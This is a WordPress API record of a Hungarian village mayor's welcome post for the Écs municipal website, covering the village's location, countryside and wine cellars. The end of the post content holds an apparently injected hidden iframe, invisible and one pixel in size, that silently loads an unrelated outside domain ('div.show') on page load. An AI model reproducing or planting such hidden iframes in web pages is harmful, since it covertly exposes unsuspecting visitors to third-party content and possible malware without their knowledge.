{"id":760,"date":"2024-09-24T09:42:54","date_gmt":"2024-09-24T07:42:54","guid":{"rendered":"https:\/\/ecsfalu.hu\/web\/?p=760"},"modified":"2025-03-27T08:52:27","modified_gmt":"2025-03-27T07:52:27","slug":"tisztelt-latogato","status":"publish","type":"post","link":"https:\/\/ecsfalu.hu\/web\/tisztelt-latogato\/","title":{"rendered":"Polg\u00e1rmesteri k\u00f6sz\u00f6nt\u0151"},"content":{"rendered":"<div class=\"wp-block-image\" style=\"text-align: justify;\"><img fetchpriority=\"high\" decoding=\"async\" class=\"wpa-warning wpa-image-missing-alt wp-image-1528 alignleft\" src=\"https:\/\/ecsfalu.hu\/web\/wp-content\/uploads\/2024\/03\/IMG-8ea2baede6f02804149f20fd03fb35ce-V2.jpg\" alt=\"\" width=\"233\" height=\"243\" data-warning=\"Missing alt text\" srcset=\"https:\/\/ecsfalu.hu\/web\/wp-content\/uploads\/2024\/03\/IMG-8ea2baede6f02804149f20fd03fb35ce-V2.jpg 811w, https:\/\/ecsfalu.hu\/web\/wp-content\/uploads\/2024\/03\/IMG-8ea2baede6f02804149f20fd03fb35ce-V2-288x300.jpg 288w, https:\/\/ecsfalu.hu\/web\/wp-content\/uploads\/2024\/03\/IMG-8ea2baede6f02804149f20fd03fb35ce-V2-768x800.jpg 768w\" sizes=\"(max-width: 233px) 100vw, 233px\" \/><\/div>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><span style=\"font-family: arial, helvetica, sans-serif;\">Tisztelt L\u00e1togat\u00f3!<\/span><\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Szeretettel k\u00f6sz\u00f6nt\u00f6m \u00d6nt \u00c9<\/span><span style=\"font-family: arial, helvetica, sans-serif;\">cs k\u00f6zs\u00e9g hivata<\/span><span style=\"font-family: arial, helvetica, sans-serif;\">los h<\/span><span style=\"font-family: arial, helvetica, sans-serif;\">onlapj\u00e1n. Telep\u00fcl\u00e9s\u00fcnk Gy\u0151r-Moson-Sopron megy\u00e9ben, Gy\u0151rt\u0151l 16 km-re a Sokor\u00f3i-dombs\u00e1g \u00e9szaki r\u00e9sz\u00e9n, fest\u0151i k\u00f6rnyezetben helyezkedik el. A Pannonhalmi T\u00e1jv\u00e9delmi K\u00f6rzethez tartoz\u00f3 erdeink kir\u00e1ndul\u00e1sra, a hegyeinken termett sz\u0151l\u0151b\u0151l k\u00e9sz\u00fclt ned\u0171ink k\u00f3stol\u00e1sra cs\u00e1b\u00edtj\u00e1k a telep\u00fcl\u00e9s\u00fcnkre \u00e9rkez\u0151ket. A t\u00e1jegys\u00e9gre jellemz\u0151 borkult\u00fara bizony\u00edt\u00e9kait a l\u00f6szfalakba v\u00e1jt pinc\u00e9k \u00e9s sz\u0151l\u0151\u00fcltetv\u00e9nyek sokas\u00e1ga jelzi.<\/span><\/p>\n<p style=\"font-weight: 400; text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Honlapunk \u00c9cs ir\u00e1nt \u00e9rdekl\u0151d\u0151k t\u00e1j\u00e9k<\/span><span style=\"font-family: arial, helvetica, sans-serif;\">oztat\u00e1s\u00e1t szolg\u00e1lja, akik telep\u00fcl\u00e9s\u00fcnk t\u00f6rt\u00e9net\u00e9vel, l\u00e1tnival\u00f3ival szeretn\u00e9nek megismerkedni. \u00c9cs k\u00f6zs\u00e9g polg\u00e1rmesterek\u00e9nt rem\u00e9lem, hogy a honlapon t\u00f6rt\u00e9nt barangol\u00e1s sor\u00e1n kedvet szereznek ahhoz, hogy telep\u00fcl\u00e9s\u00fcnket felkeress\u00e9k, megismerkedjen<\/span><span style=\"font-family: arial, helvetica, sans-serif;\">ek neve<\/span><span style=\"font-family: arial, helvetica, sans-serif;\">zetess\u00e9geinkkel \u00e9s p\u00e1r felejthetetlen napot t\u00f6ltsenek el \u00c9csen, bar\u00e1ts\u00e1gos \u00e9s vend\u00e9gszeret\u0151 lakosaink k\u00f6r\u00e9ben.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Polg\u00e1rmesterk\u00e9nt fontosnak tartom a faluk\u00f6z\u00f6ss\u00e9g rendszeres, \u0151szinte t\u00e1j\u00e9koztat\u00e1s\u00e1t. Ennek \u00e9rdek\u00e9ben \u00c9cs hivatalos honlapj\u00e1t egyfajta kapocsnak tartom a telep\u00fcl\u00e9s lak\u00f3i \u00e9s az \u00f6nkorm\u00e1nyzat, valamint a k\u00e9pvisel\u0151-test\u00fclet k\u00f6z\u00f6tt. Egy j\u00f3l m\u0171k\u00f6d\u0151, naprak\u00e9sz honlap az \u00f6nkorm\u00e1nyzat m\u0171k\u00f6d\u00e9s\u00e9nek nyilv\u00e1noss\u00e1g\u00e1t biztos\u00edtja. \u00c9cs k\u00f6zs\u00e9g lak\u00f3i a hivatalos honlapot rendszeresen l\u00e1togatva szerezhetnek naprak\u00e9sz inform\u00e1ci\u00f3kat az \u00f6nkorm\u00e1nyzat \u00e9s a k\u00e9pvisel\u0151-test\u00fclet \u00e1ltal v\u00e9gezett munk\u00e1r\u00f3l, az el\u00e9rt eredm\u00e9nyekr\u0151l, valamint a mindennapjaikat befoly\u00e1sol\u00f3 k\u00f6z\u00e9rdek\u0171 inform\u00e1ci\u00f3kr\u00f3l. Rem\u00e9nyeim szerint a honlap m\u0171k\u00f6dtet\u00e9se a j\u00f6v\u0151ben mindannyiunk megel\u00e9ged\u00e9s\u00e9re szolg\u00e1l.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Minden honlapunkra l\u00e1togat\u00f3nak j\u00f3 barangol\u00e1st \u00e9s kellemes id\u0151t\u00f6lt\u00e9st k\u00edv\u00e1nok!<\/span><\/p>\n<p style=\"font-weight: 400; padding-left: 200px;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Tisztelettel:<\/span><\/p>\n<p style=\"font-weight: 400; text-align: center; ;line-height: 10px;\"><span style=\"font-family: arial, helvetica, sans-serif;\">dr .Szab\u00f3 Norbert<\/span><\/p>\n<p style=\"font-weight: 400; text-align: center; ;line-height: 10px;\"><span style=\"font-family: arial, helvetica, sans-serif;\">polg\u00e1rmester<\/span><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Tisztelt L\u00e1togat\u00f3! Szeretettel k\u00f6sz\u00f6nt\u00f6m \u00d6nt \u00c9cs k\u00f6zs\u00e9g hivatalos honlapj\u00e1n. Telep\u00fcl\u00e9s\u00fcnk Gy\u0151r-Moson-Sopron megy\u00e9ben, Gy\u0151rt\u0151l 16 km-re a Sokor\u00f3i-dombs\u00e1g \u00e9szaki r\u00e9sz\u00e9n, fest\u0151i<\/p>\n","protected":false},"author":3,"featured_media":2737,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[23],"tags":[246,247,244,245],"class_list":["post-760","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kozsegunkrol","tag-ecs-polgarmesteri-koszontes","tag-polgarmesteri-koszontes","tag-polgarmesteri-koszonto","tag-polgarmesteri-uzenet-ecs"],"_links":{"self":[{"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/posts\/760","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/comments?post=760"}],"version-history":[{"count":12,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/posts\/760\/revisions"}],"predecessor-version":[{"id":2738,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/posts\/760\/revisions\/2738"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/media\/2737"}],"wp:attachment":[{"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/media?parent=760"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/categories?post=760"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/tags?post=760"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}